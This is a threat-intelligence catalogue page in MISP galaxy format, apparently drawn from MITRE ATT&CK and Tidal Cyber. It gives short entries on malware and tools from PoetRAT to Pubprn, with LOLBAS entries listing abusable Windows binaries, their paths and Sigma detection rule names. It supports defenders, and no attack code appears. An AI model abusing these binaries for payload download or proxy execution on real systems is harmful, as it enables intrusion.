PoetRAT is a remote access trojan (RAT) that was first identified in April 2020. PoetRAT has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. PoetRAT derived its name from references in the code to poet William Shakespeare. [Talos PoetRAT April 2020][Talos PoetRAT October 2020][Dragos Threat Report 2020]
Internal MISP references
UUID 79b4f277-3b18-4aa7-9f96-44b35b23166b
which can be used as unique global reference for PoetRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0428 |
source | MITRE |
type | ['malware'] |
PoisonIvy
PoisonIvy is a popular remote access tool (RAT) that has been used by many groups.[FireEye Poison Ivy][Symantec Elderwood Sept 2012][Symantec Darkmoon Aug 2005]
Internal MISP references
UUID 1d87a695-7989-49ae-ac1a-b6601db565c3
which can be used as unique global reference for PoisonIvy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0012 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PolyglotDuke
PolyglotDuke is a downloader that has been used by APT29 since at least 2013. PolyglotDuke has been used to drop MiniDuke.[ESET Dukes October 2019]
Internal MISP references
UUID 3b7179fa-7b8b-4068-b224-d8d9c642964d
which can be used as unique global reference for PolyglotDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0518 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pony
Pony is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.[Malwarebytes Pony April 2016]
Internal MISP references
UUID 555b612e-3f0d-421d-b2a7-63eb2d1ece5f
which can be used as unique global reference for Pony
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0453 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
POORAIM
POORAIM is a backdoor used by APT37 in campaigns since at least 2014. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 1353d695-5bae-4593-988f-9bd07a6fd1bb
which can be used as unique global reference for POORAIM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0216 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PoshC2
PoshC2 is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.[GitHub PoshC2]
Internal MISP references
UUID a3a03835-79bf-4558-8e80-7983aeb842fb
which can be used as unique global reference for PoshC2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0378 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
POSHSPY
POSHSPY is a backdoor that has been used by APT29 since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. [FireEye POSHSPY April 2017]
Internal MISP references
UUID b92f28c4-cbc8-4721-ac79-2d8bdf5247e5
which can be used as unique global reference for POSHSPY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0150 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerDuke
PowerDuke is a backdoor that was used by APT29 in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. [Volexity PowerDuke November 2016]
Internal MISP references
UUID d9e4f4a1-dd41-424e-986a-b9a39ebea805
which can be used as unique global reference for PowerDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0139 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerLess
PowerLess is a PowerShell-based modular backdoor that has been used by Magic Hound since at least 2022.[Cybereason PowerLess February 2022]
Internal MISP references
UUID 8b9159c1-db48-472b-9897-34325da5dca7
which can be used as unique global reference for PowerLess
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1012 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Power Loader
Power Loader is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. [MalwareTech Power Loader Aug 2013] [WeLiveSecurity Gapz and Redyms Mar 2013]
Internal MISP references
UUID 018ee1d9-35af-49dc-a667-11b77cd76f46
which can be used as unique global reference for Power Loader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0177 |
source | MITRE |
type | ['malware'] |
Powerpnt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary.
Author: Reegun J (OCBC Bank)
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe * C:\Program Files\Microsoft Office\Office16\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe * C:\Program Files\Microsoft Office\Office15\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe * C:\Program Files\Microsoft Office\Office14\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe * C:\Program Files\Microsoft Office\Office12\Powerpnt.exe * C:\Program Files\Microsoft Office\Office12\Powerpnt.exe
Resources: * https://twitter.com/reegun21/status/1150032506504151040 * https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Detection: * Sigma: proc_creation_win_lolbin_office.yml * IOC: Suspicious Office application Internet/network traffic[Powerpnt.exe - LOLBAS Project]
Internal MISP references
UUID 155053be-8a2c-4d5e-8206-36d992c5651d
which can be used as unique global reference for Powerpnt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5231 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
PowerPunch
PowerPunch is a lightweight downloader that has been used by Gamaredon Group since at least 2021.[Microsoft Actinium February 2022]
Internal MISP references
UUID e7cdaf70-5e28-442a-b34d-894484788dc5
which can be used as unique global reference for PowerPunch
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0685 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerShower
PowerShower is a PowerShell backdoor used by Inception for initial reconnaissance and to download and execute second stage payloads.[Unit 42 Inception November 2018][Kaspersky Cloud Atlas August 2019]
Internal MISP references
UUID 2ca245de-77a9-4857-ba93-fd0d6988df9d
which can be used as unique global reference for PowerShower
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0441 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWERSOURCE
POWERSOURCE is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. [FireEye FIN7 March 2017] [Cisco DNSMessenger March 2017]
Internal MISP references
UUID a4700431-6578-489f-9782-52e394277296
which can be used as unique global reference for POWERSOURCE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0145 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerSploit
PowerSploit is an open source, offensive security framework comprised of PowerShell modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. [GitHub PowerSploit May 2012] [PowerShellMagazine PowerSploit July 2014] [PowerSploit Documentation]
Internal MISP references
UUID 82fad10d-c921-4a87-a533-49def83d002b
which can be used as unique global reference for PowerSploit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0194 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
PowerStallion
PowerStallion is a lightweight PowerShell backdoor used by Turla, possibly as a recovery access tool to install other backdoors.[ESET Turla PowerShell May 2019]
Internal MISP references
UUID 837bcf97-37a7-4001-a466-306574fd7890
which can be used as unique global reference for PowerStallion
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0393 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWERSTATS
POWERSTATS is a PowerShell-based first stage backdoor used by MuddyWater. [Unit 42 MuddyWater Nov 2017]
Internal MISP references
UUID 39fc59c6-f1aa-4c93-8e43-1f41563e9d9e
which can be used as unique global reference for POWERSTATS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0223 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWERTON
POWERTON is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by APT33. At least two variants of the backdoor have been identified, with the later version containing improved functionality.[FireEye APT33 Guardrail]
Internal MISP references
UUID b3c28750-3825-4e4d-ab92-f39a6b0827dd
which can be used as unique global reference for POWERTON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0371 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerTool
PowerTool is a tool used to remove rootkits, as well as to detect, analyze, and fix kernel structure modifications.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID b8a101e4-e0d2-4002-94c6-18ea30da7aa7
which can be used as unique global reference for PowerTool
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5039 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
POWERTRASH
A PowerShell-based, in-memory loader that executes embedded payloads.[Mandiant FIN7 April 4 2022] According to Mandiant, POWERTRASH is a "uniquely obfuscated" version of PowerSploit's Invoke-Shellcode.ps1
shellcode invoker module known to be used by FIN7.[GitHub - PowerSploit Invoke-Shellcode]
Internal MISP references
UUID 3192d79f-2a24-4461-b4c8-4b40ef7c163f
which can be used as unique global reference for POWERTRASH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5294 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowGoop
PowGoop is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by MuddyWater as their main loader.[DHS CISA AA22-055A MuddyWater February 2022][CYBERCOM Iranian Intel Cyber January 2022]
Internal MISP references
UUID 7ed984bb-d098-4d0a-90fd-b03e68842479
which can be used as unique global reference for PowGoop
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1046 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWRUNER
POWRUNER is a PowerShell script that sends and receives commands to and from the C2 server. [FireEye APT34 Dec 2017]
Internal MISP references
UUID 67cdb7a6-5142-43fa-8b8d-d9bdd2a4dae4
which can be used as unique global reference for POWRUNER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0184 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Presentationhost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: File is used for executing Browser applications
Author: Oddvar Moe
Paths: * C:\Windows\System32\Presentationhost.exe * C:\Windows\SysWOW64\Presentationhost.exe
Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Detection: * Sigma: proc_creation_win_lolbin_presentationhost_download.yml * Sigma: proc_creation_win_lolbin_presentationhost.yml * IOC: Execution of .xbap files may not be common on production workstations[Presentationhost.exe - LOLBAS Project]
Internal MISP references
UUID 8127f51d-dce0-405a-a785-83883ba19c23
which can be used as unique global reference for Presentationhost
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5141 |
source | Tidal Cyber |
tags | ['0661bf1f-76ec-490c-937a-efa3f02bc59b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Prestige
Prestige ransomware has been used by Sandworm Team since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.[Microsoft Prestige ransomware October 2022]
Internal MISP references
UUID 4fb5b109-5a5c-5441-a0f9-f639ead5405e
which can be used as unique global reference for Prestige
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1058 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Prikormka
Prikormka is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. [ESET Operation Groundbait]
Internal MISP references
UUID 1da989a8-41cc-4e89-a435-a88acb72ae0d
which can be used as unique global reference for Prikormka
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0113 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to send files to the printer
Author: Oddvar Moe
Paths: * C:\Windows\System32\print.exe * C:\Windows\SysWOW64\print.exe
Resources: * https://twitter.com/Oddvarmoe/status/985518877076541440 * https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
Detection: * Sigma: proc_creation_win_print_remote_file_copy.yml * IOC: Print.exe retrieving files from internet * IOC: Print.exe creating executable files on disk[Print.exe - LOLBAS Project]
Internal MISP references
UUID 8ad4945d-6c54-4472-a476-906a9860fb82
which can be used as unique global reference for Print
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5142 |
source | Tidal Cyber |
tags | ['01aca077-8cfb-4d1d-9b83-3678cd26f050', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
PrintBrm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Printer Migration Command-Line Tool
Author: Elliot Killick
Paths: * C:\Windows\System32\spool\tools\PrintBrm.exe
Resources: * https://twitter.com/elliotkillick/status/1404117015447670800
Detection: * Sigma: proc_creation_win_lolbin_printbrm.yml * IOC: PrintBrm.exe should not be run on a normal workstation[PrintBrm.exe - LOLBAS Project]
Internal MISP references
UUID 93ec2323-f93b-4d21-9930-f367948187f0
which can be used as unique global reference for PrintBrm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5143 |
source | Tidal Cyber |
tags | ['37a70ca8-a027-458c-9a48-7e0d307462be', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ProcDump
ProcDump is a tool used to monitor applications for CPU spikes and generate crash dumps.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 0d6e00a3-6237-458a-85e5-1128bd7f4f50
which can be used as unique global reference for ProcDump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5036 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c3eaf8a7-06e5-4e3a-9615-36316d9e10a8', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Process Hacker
Process Hacker is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID d390ea7d-0995-4069-924d-65d6c7c98e3c
which can be used as unique global reference for Process Hacker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5040 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ProLock
ProLock is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with QakBot. ProLock is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.[Group IB Ransomware September 2020]
Internal MISP references
UUID c8af096e-c71e-4751-b203-70c285b7a7bd
which can be used as unique global reference for ProLock
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0654 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
ProtocolHandler
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary
Author: Nir Chako
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_protocolhandler_download.yml * IOC: Suspicious Office application Internet/network traffic[ProtocolHandler.exe - LOLBAS Project]
Internal MISP references
UUID 2ecf8041-8069-41a0-b6e8-5b328ae69e31
which can be used as unique global reference for ProtocolHandler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5232 |
source | Tidal Cyber |
tags | ['77131d00-b8b2-42ef-afbd-1fbfc12729df', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Proton
Proton is a macOS backdoor focusing on data theft and credential access [objsee mac malware 2017].
Internal MISP references
UUID d3bcdbc4-5998-4e50-bd45-cba6a3278427
which can be used as unique global reference for Proton
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0279 |
source | MITRE |
type | ['malware'] |
Provlaunch
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Launcher process
Author: Grzegorz Tworek
Paths: * c:\windows\system32\provlaunch.exe
Resources: * https://twitter.com/0gtweet/status/1674399582162153472
Detection: * Sigma: proc_creation_win_provlaunch_potential_abuse.yml * Sigma: proc_creation_win_provlaunch_susp_child_process.yml * Sigma: proc_creation_win_registry_provlaunch_provisioning_command.yml * Sigma: registry_set_provisioning_command_abuse.yml * IOC: c:\windows\system32\provlaunch.exe executions * IOC: Creation/existence of HKLM\SOFTWARE\Microsoft\Provisioning\Commands subkeys[Provlaunch.exe - LOLBAS Project]
Internal MISP references
UUID 83e1ac24-3928-40ba-b701-d72549a9430c
which can be used as unique global reference for Provlaunch
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5144 |
source | Tidal Cyber |
tags | ['9e5ec91c-0d0f-4e40-846d-d7b7eb941e17', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Proxysvc
Proxysvc is a malicious DLL used by Lazarus Group in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of Proxysvc is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. [McAfee GhostSecret]
Internal MISP references
UUID 94f43629-243e-49dc-8c2b-cdf4fc15cf83
which can be used as unique global reference for Proxysvc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0238 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
PS1
PS1 is a loader that was used to deploy 64-bit backdoors in the CostaRicto campaign.[BlackBerry CostaRicto November 2020]
Internal MISP references
UUID 8cd401ac-a233-4395-a8ae-d75db9d5b845
which can be used as unique global reference for PS1
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0613 |
source | MITRE |
type | ['malware'] |
PsExec
PsExec is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.[Russinovich Sysinternals][SANS PsExec]
Internal MISP references
UUID 73eb32af-4bd3-4e21-8048-355edc55a9c6
which can be used as unique global reference for PsExec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0029 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e1af18e3-3224-4e4c-9d0f-533768474508', '5cd85fec-0e37-4892-9cd2-bb8c70139072', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '950e8d3a-044b-43e3-b5db-bba61f70ff51', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Psr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko
Paths: * c:\windows\system32\psr.exe * c:\windows\syswow64\psr.exe
Detection: * Sigma: proc_creation_win_psr_capture_screenshots.yml * IOC: psr.exe spawned * IOC: suspicious activity when running with "/gui 0" flag[Psr.exe - LOLBAS Project]
Internal MISP references
UUID 1945584b-bb16-48a2-902d-2a1c9591efcd
which can be used as unique global reference for Psr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5145 |
source | Tidal Cyber |
tags | ['08f4ef8d-94bb-42f7-b76d-71bcc809bcc9', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Psylo
Psylo is a shellcode-based Trojan that has been used by Scarlet Mimic. It has similar characteristics as FakeM. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 8c35d349-2f70-4edb-8668-e1cc2b67e4a0
which can be used as unique global reference for Psylo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0078 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pteranodon
Pteranodon is a custom backdoor used by Gamaredon Group. [Palo Alto Gamaredon Feb 2017]
Internal MISP references
UUID 7fed4276-807e-4656-95f5-90878b6e2dbb
which can be used as unique global reference for Pteranodon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0147 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pubprn
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Proxy execution with Pubprn.vbs
Author: Oddvar Moe
Paths: * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
Resources: * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://github.com/enigma0x3/windows-operating-system-archaeology
